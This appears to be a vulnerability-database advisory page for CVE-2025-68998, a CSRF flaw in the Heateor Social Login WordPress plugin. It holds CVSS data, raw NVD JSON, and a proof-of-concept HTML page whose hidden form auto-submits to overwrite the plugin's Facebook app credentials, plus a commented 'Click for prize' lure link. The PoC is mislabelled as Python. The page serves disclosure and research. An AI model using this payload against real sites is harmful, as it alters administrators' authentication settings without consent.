Security Vulnerability Report
中文
CVE-2025-68998 CVSS 5.4 MEDIUM

CVE-2025-68998

Published: 2025-12-30 11:15:59
Last Modified: 2026-04-27 19:16:41

Description

Cross-Site Request Forgery (CSRF) vulnerability in Heateor Support Heateor Social Login heateor-social-login allows Cross Site Request Forgery.This issue affects Heateor Social Login: from n/a through <= 1.1.39.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

heateor-social-login <= 1.1.39

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-68998 - Heateor Social Login --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - Do Not Click</title> </head> <body> <h1>Social Login Settings Modification PoC</h1> <p>This is a proof-of-concept for CVE-2025-68998 CSRF vulnerability.</p> <!-- Auto-submit form to modify plugin settings --> <form id="csrfForm" action="[TARGET_WORDPRESS_URL]/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Heateor plugin settings action --> <input type="hidden" name="action" value="heateor_sl_save_options"> <!-- CSRF token missing or not validated --> <input type="hidden" name="option_page" value="heateor-social-login"> <!-- Malicious configuration values --> <input type="hidden" name="heateor_sl_options[facebook_app_id]" value="malicious_app_id"> <input type="hidden" name="heateor_sl_options[facebook_app_secret]" value="malicious_secret"> <input type="hidden" name="heateor_sl_options[enable_fb]" value="1"> <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=heateor-social-login"> </form> <script> // Auto-submit the form when page loads window.onload = function() { document.getElementById('csrfForm').submit(); }; </script> <p>If you see this text, the attack has been executed.</p> </body> </html> <!-- Alternative: Short link-based PoC --> <!-- <a href="[TARGET_WORDPRESS_URL]/wp-admin/admin-post.php?action=heateor_sl_save_options&option_page=heateor-social-login&heateor_sl_options[facebook_app_id]=malicious">Click for prize</a> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68998", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:58.687", "lastModified": "2026-04-27T19:16:40.993", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Heateor Support Heateor Social Login heateor-social-login allows Cross Site Request Forgery.This issue affects Heateor Social Login: from n/a through <= 1.1.39."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/heateor-social-login/vulnerability/wordpress-heateor-social-login-plugin-1-1-39-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}